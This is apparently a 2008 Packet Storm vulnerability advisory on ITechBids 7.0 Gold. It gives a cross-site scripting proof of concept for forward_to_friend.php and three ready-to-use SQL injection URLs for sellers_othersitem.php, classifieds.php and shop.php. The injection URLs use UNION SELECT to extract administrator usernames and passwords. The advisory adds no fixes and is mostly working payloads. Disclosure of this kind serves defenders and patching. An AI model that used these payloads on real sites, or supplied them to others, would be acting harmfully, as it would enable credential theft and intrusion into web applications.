itechbids-sqlxss.txt

2008-07-15T00:00:00
ID PACKETSTORM:68186
Type packetstorm
Reporter Encrypt3d.M!nd
Modified 2008-07-15T00:00:00

Description

                                        
                                            `######## ## ## ###### ######## ## ## ######## ######## ####### ########   
## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ##  
## #### ## ## ## ## #### ## ## ## ## ## ##  
###### ## ## ## ## ######## ## ######## ## ####### ## ##  
## ## #### ## ## ## ## ## ## ## ## ##  
## ## ### ## ## ## ## ## ## ## ## ## ## ##  
######## ## ## ###### ## ## ## ## ## ####### ########   
  
################################ !R4Q!4N H4CK3R ###################################  
  
ITechBids 7.0 Gold Multiple Remote Vulnerabilities  
  
Website : http://www.itechscripts.com  
  
Founded By : Encrypt3d.M!nd  
  
NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.  
  
  
# 1- Cross-site scripting (XSS):  
  
Affected File : forward_to_friend.php  
  
PoC :  
  
/forward_to_friend.php?productid=<script>alert(666);</script>  
  
  
# 2-Remote Sql Injection(s) :  
  
Affected File(s) :  
  
sellers_othersitem.php  
classifieds.php  
shop.php  
  
Note:There is Other Files Affected But I Couldn't Exploit Them :(  
  
PoC:  
  
/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin  
  
  
# Greetz:  
  
MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,  
KoRn The Dog,Mini-Spider,All My Friends  
  
  
The EnD :D  
  
`